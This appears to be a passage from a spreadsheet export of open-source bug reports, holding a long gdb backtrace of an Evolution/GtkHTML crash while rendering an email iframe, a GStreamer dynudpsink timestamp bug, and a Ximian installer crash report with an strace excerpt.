/usr/lib/libgobject-2.0.so.0
#77 0x40f2af71 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#78 0x4040fe5c in html_iframe_init (iframe=0xb0b2888 klass=0x404207a0
    parent=0x81a7e08 src=0xb8023c8 cid:@@@197 width=-1 height=-1 
    border=0) at htmliframe.c:654
#79 0x4040efb3 in html_iframe_new (parent=0x81a7e08 
    src=0xb8023c8 cid:@@@197 width=-1 height=-1 border=0)
    at htmliframe.c:111
#80 0x403e449b in parse_iframe (e=0x8578720 
    str=0xb2e65be src=\cid:@@@197\ frameborder=0 scrolling=no&gt; 
    _clue=0xb3c0868) at htmlengine.c:1741
#81 0x403e80ac in parse_one_token (p=0x8578720 clue=0xb3c0868 
    str=0xb2e65b6 &lt;iframe src=\cid:@@@197\ frameborder=0
scrolling=no&gt;)
    at htmlengine.c:3203
#82 0x403e2389 in parse_body (e=0x8578720 clue=0xb3c0868
end=0x4041ceac 
    toplevel=1 begin=1) at htmlengine.c:880
#83 0x403e95e6 in html_engine_timer_event (e=0x8578720) at
htmlengine.c:4061
#84 0x403e9701 in html_engine_stream_end (stream=0xb73d4c0 
    status=GTK_HTML_STREAM_OK data=0x8578720) at htmlengine.c:4123
#85 0x403bbb59 in gtk_html_stream_close (stream=0xb73d4c0 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
#86 0x403c1a8b in gtk_html_end (html=0x81a7e08 handle=0xb73d4c0 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:3176
#87 0x41343337 in mail_display_render (md=0x856caf8 html=0x81a7e08 
    reset_scroll=1) at mail-display.c:1913
#88 0x41343399 in mail_display_redisplay (md=0x856caf8 reset_scroll=1)
    at mail-display.c:1941
#89 0x4134349f in mail_display_set_message (md=0x856caf8
medium=0x974bb88 
    folder=0x829a728 info=0x960bff0) at mail-display.c:1993
#90 0x41329cd5 in done_message_selected (folder=0x829a728 
    uid=0xb65f750 160374 msg=0x974bb88 data=0x854e270)
    at folder-browser.c:2425
#91 0x41351b72 in get_message_got (mm=0xb0276c8) at mail-ops.c:1658
#92 0x4134dd21 in mail_msgport_replied (source=0x81acc30 cond=G_IO_IN
    d=0x81afbc8) at mail-mt.c:393
#93 0x40f867b3 in g_vsnprintf () from /usr/lib/libglib-2.0.so.0
#94 0x40f68ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#95 0x40f698cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#96 0x40f69c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#97 0x40f6a306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#98 0x405cd9a2 in bonobo_main () at bonobo-main.c:293
#99 0x0809286c in main (argc=1 argv=0xbffff9d4) at main.c:610
#100 0x40fc41c4 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 6150 (LWP 14495)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81acaf8) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81acaf8 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbefffa4c
#4  0x4025781c in thread_dispatch (din=0x81acaa0) at e-msgport.c:665
	e = (EThread *) 0x81acaa0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 6150
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 14492)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x42808c18) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x42808c18 __canceltype = -1088423308 __prev = 0x0}
	msg = (EMsg *) 0xbf1ffa4c
#4  0x4025781c in thread_dispatch (din=0x4280ba18) at e-msgport.c:665
	e = (EThread *) 0x4280ba18
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 4101
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 14491)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81acaf8) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81acaf8 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf3ffa4c
#4  0x4025781c in thread_dispatch (din=0x81acaa0) at e-msgport.c:665
	e = (EThread *) 0x81acaa0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 3076
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 14490)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x8126140) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x8126140 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf5ffa4c
#4  0x4025781c in thread_dispatch (din=0x81260e8) at e-msgport.c:665
	e = (EThread *) 0x81260e8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 2051
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 14489)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x8126098) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x8126098 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf7ffa4c
#4  0x4025781c in thread_dispatch (din=0x81b17a8) at e-msgport.c:665
	e = (EThread *) 0x81b17a8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 1026
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 14488)):
#0  0x41081b60 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4006bcda in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 14485)):
#0  0x410574d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x410cf30c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40477cd5 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:646
	estatus = 1074204114
	in_segv = 1
	pid = 0
#4  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x40fd50a1 in kill () from /lib/libc.so.6
No symbol table info available.
#7  0x4006efe6 in raise () from /lib/libpthread.so.0
No symbol table info available.
#8  0x40fd6364 in abort () from /lib/libc.so.6
No symbol table info available.
#9  0x40f6f95c in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x40f6fa03 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40efc0d2 in pango_shape () from /usr/lib/libpango-1.0.so.0
No symbol table info available.
#12 0x4040ace3 in html_get_glyphs_non_tab (glyphs=0x0 item=0xbcb12d0 
    text=0x40417f64 &gt;  bytes=2 len=2) at htmltextslave.c:626
	str = (PangoGlyphString *) 0x84123e0
	tab = (
    gchar *) 0x40efd5a0 file %s: line %d (%s): assertion failed: (%s)
#13 0x403ee3ba in html_gdk_painter_text_itemize_and_prepare_glyphs (
    painter=0xb4a7dd8 desc=0xbb72298 text=0x40417f64 &gt;  bytes=2 
    glyphs=0xbfffdd88) at htmlgdkpainter.c:96
	item = (PangoItem *) 0xbcb12d0
	il = (GList *) 0x43f4f578
	end = (gchar *) 0x40417f66 
	attrs = (PangoAttrList *) 0xad1a468
	items = (GList *) 0x43f4f578
#14 0x403ee428 in text_width (painter=0xb4a7dd8 desc=0xbb72298 
    text=0x40417f64 &gt;  bytes=2) at htmlgdkpainter.c:133
	items = (GList *) 0xb4a7dd8
	glyphs = (GList *) 0x0
	width = 0
#15 0x403ee8b4 in alloc_font (painter=0xb4a7dd8 face=0xb2e4550 5 
    size=12.5 points=0 style=12) at htmlgdkpainter.c:231
	painter = (HTMLPainter *) 0xb4a7dd8
	face = (gchar *) 0x0
	size = 12.5
	desc = (PangoFontDescription *) 0xbb72298
#16 0x403fa33f in html_painter_alloc_font (painter=0xb4a7dd8 
    face_name=0xb2e4550 5 size=12.5 points=0 style=12)
    at htmlpainter.c:592
	size = 12.5
#17 0x403eda2a in manager_alloc_font (manager=0xb4a7de4 face=0xb2e4550
5 
    style=12) at htmlfontmanager.c:263
	manager = (HTMLFontManager *) 0xb4a7de4
	style = 12
#18 0x403edafe in alloc_new_font (manager=0xb4a7de4 set=0xbfffdeb8 
    face_list=0xbc31238 5 style=12) at htmlfontmanager.c:296
	face_name = (gchar *) 0xb2e4550 5
	font = (HTMLFont *) 0x0
	faces = (gchar **) 0xbc4cf10
	face = (gchar **) 0xbc4cf10
#19 0x403edc5f in html_font_manager_get_font (manager=0xb4a7de4 
    face_list=0xbc31238 5 style=12) at htmlfontmanager.c:335
	set = (HTMLFontSet *) 0x0
	font = (HTMLFont *) 0x0
#20 0x403f91d0 in html_painter_get_font (painter=0xb4a7dd8 
    face=0xbc31238 5 style=12) at htmlpainter.c:284
	font = (HTMLFont *) 0x40efd5a0
#21 0x404077c5 in html_text_get_items (text=0xbd131a0
painter=0xb4a7dd8)
    at htmltext.c:916
	painter = (HTMLPainter *) 0xb4a7dd8
	__t = 3221214012
	__r = 1089459616
	pc = (PangoContext *) 0xb08f810
	heap = (gchar *) 0x0
	bytes = 49
#22 0x40407875 in calc_min_width (self=0xbd131a0 painter=0xb4a7dd8)
    at htmltext.c:934
	prev = (HTMLObject *) 0xc
	next = (HTMLObject *) 0x0
	obj = (HTMLObject *) 0xbd131a0
	i = 1
	w = 0
	mw = 0
#23 0x403f662e in html_object_calc_min_width (o=0xbd131a0
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xbd131a0
#24 0x403ca280 in calc_min_width (o=0xb97e540 painter=0xb4a7dd8)
    at htmlclueflow.c:646
	cur = (HTMLObject *) 0xbd131a0
	min_width = 0
	aligned_min_width = 0
	w = 0
#25 0x403f662e in html_object_calc_min_width (o=0xb97e540
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xb97e540
#26 0x403c86ec in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmlclue.c:363
	w = 1089459616
	o = (HTMLObject *) 0x0
	obj = (HTMLObject *) 0xb97e540
	minWidth = 148
#27 0x403cefb0 in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmlcluev.c:306
	painter = (HTMLPainter *) 0xb4a7dd8
#28 0x40405408 in calc_min_width (o=0xb93a058 painter=0xb4a7dd8)
    at htmltablecell.c:154
	o = (HTMLObject *) 0xb93a058
#29 0x403f662e in html_object_calc_min_width (o=0xb93a058
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xb93a058
#30 0x404016f7 in calc_column_width_step (table=0x98c3c50
painter=0xb4a7dd8 
    array=0x43f4dd88 sizes=0xb60f520 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
	cell = (HTMLTableCell *) 0xb93a058
	col_width = -1073749704
	span_width = 1091358624
	cspan = 1089459616
	new_width = -1073753284
	added = 1091359664
	has_greater_cspan = 0
	r = 0
	c = 0
	i = 201121904
	pixel_size = 1
	border_extra = 2
#31 0x404019a2 in calc_column_width_template (table=0x98c3c50 
    painter=0xb4a7dd8 array=0x43f4dd88 
    calc_fn=0x403f6614  pref=0x43f4dd88)
    at htmltable.c:910
	c = 4
	add = 3
	span = 1
	pixel_size = 1
	cell_space = 2
	arr = (gint *) 0xb60f520
	next = 1
#32 0x40402908 in calc_min_width (o=0x98c3c50 painter=0xb4a7dd8)
    at htmltable.c:1325
	o = (HTMLObject *) 0x98c3c50
#33 0x403f662e in html_object_calc_min_width (o=0x98c3c50
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0x98c3c50
#34 0x403ca280 in calc_min_width (o=0xb13d8e8 painter=0xb4a7dd8)
    at htmlclueflow.c:646
	cur = (HTMLObject *) 0x98c3c50
	min_width = 0
	aligned_min_width = 0
	w = 0
#35 0x403f662e in html_object_calc_min_width (o=0xb13d8e8
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xb13d8e8
#36 0x403c86ec in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmlclue.c:363
	w = 1089459616
	o = (HTMLObject *) 0xbceae80
	obj = (HTMLObject *) 0xb13d8e8
	minWidth = 0
#37 0x403cefb0 in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmlcluev.c:306
	painter = (HTMLPainter *) 0xb4a7dd8
#38 0x40405408 in calc_min_width (o=0xbceae80 painter=0xb4a7dd8)
    at htmltablecell.c:154
	o = (HTMLObject *) 0xbceae80
#39 0x403f662e in html_object_calc_min_width (o=0xbceae80
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xbceae80
#40 0x404016f7 in calc_column_width_step (table=0xbeae9b8
painter=0xb4a7dd8 
    array=0xacba564 sizes=0xb799368 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
	cell = (HTMLTableCell *) 0xbceae80
	col_width = -1073749144
	span_width = 1091358624
	cspan = 1089459616
	new_width = -1073753284
	added = 1091359664
	has_greater_cspan = 0
	r = 0
	c = 0
	i = 201121904
	pixel_size = 1
	border_extra = 0
#41 0x404019a2 in calc_column_width_template (table=0xbeae9b8 
    painter=0xb4a7dd8 array=0xacba564 
    calc_fn=0x403f6614  pref=0xacba564)
    at htmltable.c:910
	c = 4
	add = -1073749032
	span = 1
	pixel_size = 1
	cell_space = 0
	arr = (gint *) 0xb799368
	next = 1
#42 0x40402908 in calc_min_width (o=0xbeae9b8 painter=0xb4a7dd8)
    at htmltable.c:1325
	o = (HTMLObject *) 0xbeae9b8
#43 0x403f662e in html_object_calc_min_width (o=0xbeae9b8
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xbeae9b8
#44 0x403ca280 in calc_min_width (o=0xb574170 painter=0xb4a7dd8)
    at htmlclueflow.c:646
	cur = (HTMLObject *) 0xbeae9b8
	min_width = 0
	aligned_min_width = 0
	w = 0
#45 0x403f662e in html_object_calc_min_width (o=0xb574170
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xb574170
#46 0x403c86ec in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmlclue.c:363
	w = 1089459616
	o = (HTMLObject *) 0xba4bdf0
	obj = (HTMLObject *) 0xb574170
	minWidth = 0
#47 0x403cefb0 in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmlcluev.c:306
	painter = (HTMLPainter *) 0xb4a7dd8
#48 0x40405408 in calc_min_width (o=0xba4bdf0 painter=0xb4a7dd8)
    at htmltablecell.c:154
	o = (HTMLObject *) 0xba4bdf0
#49 0x403f662e in html_object_calc_min_width (o=0xba4bdf0
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0xba4bdf0
#50 0x404016f7 in calc_column_width_step (table=0x9ea9ec0
painter=0xb4a7dd8 
    array=0x4285b868 sizes=0xb85e1f0 
    calc_fn=0x403f6614  span=1) at
htmltable.c:859
	cell = (HTMLTableCell *) 0xba4bdf0
	col_width = 10
	span_width = 0
	cspan = 1089459616
	new_width = -1073753284
	added = 10
	has_greater_cspan = 1
	r = 1
	c = 1
	i = 1
	pixel_size = 1
	border_extra = 0
#51 0x404019a2 in calc_column_width_template (table=0x9ea9ec0 
    painter=0xb4a7dd8 array=0x4285b868 
    calc_fn=0x403f6614  pref=0x4285b868)
    at htmltable.c:910
	c = 8
	add = 3
	span = 1
	pixel_size = 1
	cell_space = 0
	arr = (gint *) 0xb85e1f0
	next = 1
#52 0x40402908 in calc_min_width (o=0x9ea9ec0 painter=0xb4a7dd8)
    at htmltable.c:1325
	o = (HTMLObject *) 0x9ea9ec0
#53 0x403f662e in html_object_calc_min_width (o=0x9ea9ec0
painter=0xb4a7dd8)
    at htmlobject.c:941
	o = (HTMLObject *) 0x9ea9ec0
#54 0x40403cb0 in html_table_set_max_width (o=0x9ea9ec0
painter=0xb4a7dd8 
    max_width=0) at htmltable.c:1754
	max_size = (gint *) 0xb4a7dd8
	pixel_size = 1
	glue = 0
	border_extra = 0
	min_width = 1089459616
#55 0x403f6541 in html_object_set_max_width (o=0x9ea9ec0
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
	o = (HTMLObject *) 0x40efd5a0
#56 0x403ca1cd in set_max_width (o=0xb5741e8 painter=0xb4a7dd8
max_width=0)
    at htmlclueflow.c:625
	o = (HTMLObject *) 0xb5741e8
	max_width = 1089459616
	obj = (HTMLObject *) 0x9ea9ec0
	indent = 0
#57 0x403f6541 in html_object_set_max_width (o=0xb5741e8
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
	o = (HTMLObject *) 0x40efd5a0
#58 0x403cf05f in set_max_width (o=0xaf21f20 painter=0xb4a7dd8
max_width=0)
    at htmlcluev.c:325
	o = (HTMLObject *) 0xb5741e8
	max_width = 0
	obj = (HTMLObject *) 0xb5741e8
#59 0x403f6541 in html_object_set_max_width (o=0xaf21f20
painter=0xb4a7dd8 
    max_width=0) at htmlobject.c:897
	o = (HTMLObject *) 0x40efd5a0
#60 0x403ea044 in html_engine_calc_size (e=0x8578910 changed_objs=0x0)
    at htmlengine.c:4388
	e = (HTMLEngine *) 0x8578910
	max_width = 1
#61 0x403e924d in html_engine_update_event (e=0x8578910) at
htmlengine.c:3926
	e = (HTMLEngine *) 0x8578910
#62 0x403e963b in html_engine_timer_event (e=0x8578910) at
htmlengine.c:4074
	e = (HTMLEngine *) 0x8578910
	end = {0x0}
	retval = 0
#63 0x403e9701 in html_engine_stream_end (stream=0xafeceb8 
    status=GTK_HTML_STREAM_OK data=0x8578910) at htmlengine.c:4123
	data = 0x8578910
	e = (HTMLEngine *) 0x8578910
#64 0x403bbb59 in gtk_html_stream_close (stream=0xafeceb8 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
	stream = (GtkHTMLStream *) 0xafeceb8
#65 0x403c1a8b in gtk_html_end (html=0x81a7e08 handle=0xafeceb8 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:3176
No locals.
#66 0x41341e77 in on_url_requested (html=0x81a7e08 
    url=0xbad3fd8 cid:@@@197 handle=0xafeceb8 user_data=0x856caf8)
    at mail-display.c:1297
	url = 0x98af0d8 Ã¼Ã°\212\t\001
	md = (MailDisplay *) 0x856caf8
	gconf = (GConfClient *) 0x80dfad0
	urls = (GHashTable *) 0x40efd5a0
	medium = (CamelMedium *) 0x43fdbe70
	ba = (GByteArray *) 0x40efd5a0
#67 0x403f4f58 in html_g_cclosure_marshal_VOID__STRING_POINTER (
    closure=0x8578c70 return_value=0x0 n_param_values=3 
    param_values=0xbfffeb70 invocation_hint=0xbfffea78
marshal_data=0x0)
    at htmlmarshal.c:120
	closure = (GClosure *) 0x8578c70
	param_values = (GValue *) 0xbfffeb70
	callback = 0x1
	data1 = 0x81a7e08
	data2 = 0x40efd5a0
#68 0x40f18dca in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#69 0x40f2bcff in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#70 0x40f2a502 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0x40f2a77f in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x403bc2c7 in html_engine_url_requested_cb (engine=0x8578720 
    url=0xad1ae10 cid:@@@197 handle=0xafeceb8 data=0x81a7e08)
    at gtkhtml.c:430
	data = 0xb7a4050
	gtk_html = (GtkHTML *) 0x81a7e08
	expanded = 0xb7a4050 cid:@@@197
#73 0x403f4f58 in html_g_cclosure_marshal_VOID__STRING_POINTER (
    closure=0x8578620 return_value=0x0 n_param_values=3 
    param_values=0xbffff020 invocation_hint=0xbfffef28
marshal_data=0x0)
    at htmlmarshal.c:120
	closure = (GClosure *) 0x8578620
	param_values = (GValue *) 0xbffff020
	callback = 0x1
	data1 = 0x8578720
	data2 = 0x40efd5a0
#74 0x40f18dca in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#75 0x40f2bcff in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#76 0x40f2a502 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#77 0x40f2af71 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#78 0x4040fe5c in html_iframe_init (iframe=0xb0b2888 klass=0x404207a0
    parent=0x81a7e08 src=0xb8023c8 cid:@@@197 width=-1 height=-1 
    border=0) at htmliframe.c:654
	border = 1089459616
	new_tokenizer = (HTMLTokenizer *) 0xbd4f550
	new_widget = (GtkWidget *) 0xafeceb8
	new_html = (GtkHTML *) 0xa595060
	parent_html = (GtkHTML *) 0x81a7e08
	handle = (GtkHTMLStream *) 0xafeceb8
	scrolled_window = (GtkWidget *) 0xb3f53b0
	depth = 1
#79 0x4040efb3 in html_iframe_new (parent=0x81a7e08 
    src=0xb8023c8 cid:@@@197 width=-1 height=-1 border=0)
    at htmliframe.c:111
	border = 0
	iframe = (HTMLIFrame *) 0xb0b2888
#80 0x403e449b in parse_iframe (e=0x8578720 
    str=0xb2e65be src=\cid:@@@197\ frameborder=0 scrolling=no&gt; 
    _clue=0xb3c0868) at htmlengine.c:1741
	e = (HTMLEngine *) 0x8578720
	src = 0xb8023c8 cid:@@@197
	align = 0x0
	iframe = (HTMLObject *) 0xb4ca667
	end = {0x40417d6b &lt;/iframe 0x0}
	width = -1
	height = -1
	border = 0
	scroll = GTK_POLICY_NEVER
	margin_width = -1
	margin_height = -1
#81 0x403e80ac in parse_one_token (p=0x8578720 clue=0xb3c0868 
    str=0xb2e65b6 &lt;iframe src=\cid:@@@197\ frameborder=0
scrolling=no&gt;)
    at htmlengine.c:3203
	str = (gchar *) 0x1 
	indx = 1089459616
#82 0x403e2389 in parse_body (e=0x8578720 clue=0xb3c0868
end=0x4041ceac 
    toplevel=1 begin=1) at htmlengine.c:880
	i = 0
	str = (
    gchar *) 0xb2e65b6 &lt;iframe src=\cid:@@@197\ frameborder=0
scrolling=no&gt;
	rv = (gchar *) 0x0
	final = 0
#83 0x403e95e6 in html_engine_timer_event (e=0x8578720) at
htmlengine.c:4061
	e = (HTMLEngine *) 0x8578720
	end = {0x0}
	retval = 1
#84 0x403e9701 in html_engine_stream_end (stream=0xb73d4c0 
    status=GTK_HTML_STREAM_OK data=0x8578720) at htmlengine.c:4123
	data = 0x8578720
	e = (HTMLEngine *) 0x8578720
#85 0x403bbb59 in gtk_html_stream_close (stream=0xb73d4c0 
    status=GTK_HTML_STREAM_OK) at gtkhtml-stream.c:130
	stream = (GtkHTMLStream *) 0xb73d4c0
#86 0x403c1a8b in gtk_html_end (html=0x81a7e08 handle=0xb73d4c0 
    status=GTK_HTML_STREAM_OK) at gtkhtml.c:3176
No locals.
#87 0x41343337 in mail_display_render (md=0x856caf8 html=0x81a7e08 
    reset_scroll=1) at mail-display.c:1913
	flag = 0x0
	completed = 0x0
	html_stream = (GtkHTMLStream *) 0xb73d4c0
	stream = (MailDisplayStream *) 0x98af0d8
#88 0x41343399 in mail_display_redisplay (md=0x856caf8 reset_scroll=1)
    at mail-display.c:1941
	md = (MailDisplay *) 0x856caf8
#89 0x4134349f in mail_display_set_message (md=0x856caf8
medium=0x974bb88 
    folder=0x829a728 info=0x960bff0) at mail-display.c:1993
	md = (MailDisplay *) 0x856caf8
	medium = (CamelMedium *) 0x960bff0
#90 0x41329cd5 in done_message_selected (folder=0x829a728 
    uid=0xb65f750 160374 msg=0x974bb88 data=0x854e270)
    at folder-browser.c:2425
	folder = (CamelFolder *) 0x960bff0
	fb = (FolderBrowser *) 0x854e270
	info = (CamelMessageInfo *) 0x960bff0
	gconf = (GConfClient *) 0x80dfad0
	timeout = 1500
#91 0x41351b72 in get_message_got (mm=0xb0276c8) at mail-ops.c:1658
	mm = (struct _mail_msg *) 0x0
#92 0x4134dd21 in mail_msgport_replied (source=0x81acc30 cond=G_IO_IN
    d=0x81afbc8) at mail-mt.c:393
	port = (EMsgPort *) 0x81afbc8
	m = (mail_msg_t *) 0xb0276c8
#93 0x40f867b3 in g_vsnprintf () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#94 0x40f68ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#95 0x40f698cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#96 0x40f69c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#97 0x40f6a306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#98 0x405cd9a2 in bonobo_main () at bonobo-main.c:293
	loop = (GMainLoop *) 0x80eb478
#99 0x0809286c in main (argc=1 argv=0xbffff9d4) at main.c:610
	argc = -1073743744
	options = {{longName = 0x80b72ed no-splash shortName = 0 '\0' 
    argInfo = 0 arg = 0x80bbea8 val = 0 
    descrip = 0x80b72f7 Disable splash screen argDescrip = 0x0} {
    longName = 0x80b0ab0 offline shortName = 0 '\0' argInfo = 0 
    arg = 0x80bbeb0 val = 0 descrip = 0x80b730d Start in offline
mode 
    argDescrip = 0x0} {longName = 0x80b45fd online shortName = 0
'\0' 
    argInfo = 0 arg = 0x80bbeac val = 0 
    descrip = 0x80b7323 Start in online mode argDescrip = 0x0} {
    longName = 0x80b7338 debug shortName = 0 '\0' argInfo = 1 
    arg = 0x80be170 val = 0 
    descrip = 0x80b78a0 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0'
argInfo = 4 
    arg = 0x40682804 val = 0 descrip = 0x80b733e Help options: 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_poin</t>
  </si>
  <si>
    <t>GSTREAMER-333624</t>
  </si>
  <si>
    <t>invalid get_times implementation in gstdynudpsink</t>
  </si>
  <si>
    <t>Please describe the problem:
The get_times() implementation of dynudpsink does not handle invalid
timestamp/duration values. As a consequence gstbasesink triggers out-of-segment
warning messages on the pipeline  bus for each buffer processed by dynudpsink
making the applications unusable.
This bug is only triggered by gstreamer-0.10.3 and newer which added the
out-of-segment check (gstbasesink.c:gst_base_sink_get_sync_times()).
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Yes.
Other information:
The bug was found by a user of the sofsip_cli SIP/VoIP client. See 
https://sourceforge.net/tracker/index.php?func=detail&amp;aid=1442875&amp;group_id=143636&amp;atid=756076</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-54089</t>
  </si>
  <si>
    <t>ximian installer crashes &amp;&amp; red-carpet too</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bugzilla.gnome.org
Severity: normal
Version: 0.50
Synopsis: ximian installer crashes &amp;&amp; red-carpet too
Bugzilla-Product: bugzilla.gnome.org
Bugzilla-Component: bug data
Description:
i downloaded installer for ximian but it crashes on my machine. below i attached
strace relevant part but it says nothing interesting to me.
my distr. is rh62 and i downloaded installer for this i've made many changes on my box (compiled glib gtk upgraded glibc-2.1 (from rpm)).
i tried to upgrade all rpms manualy it works but red-carpet still crashes. now i've glibc-2.2 too - no changes. Maybe i've some kind of buggy
configuration but it would be nice to see: you have no xxx.conf on place instead SIGSEGV.
write(2 Distro is redhat-62-i386\n 25Distro is redhat-62-i386
) = 25
open(/var/cache/redcarpet/packages/rc-dpkg-helper.so O_WRONLY|O_CREAT|O_TRUNC
 0600) = 5
write(5 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\4\0\000... 3188) =
 3188
close(5)                                = 0
open(/var/cache/redcarpet/packages/rc-rpm-helper.so O_WRONLY|O_CREAT|O_TRUNC
 0600) = 5
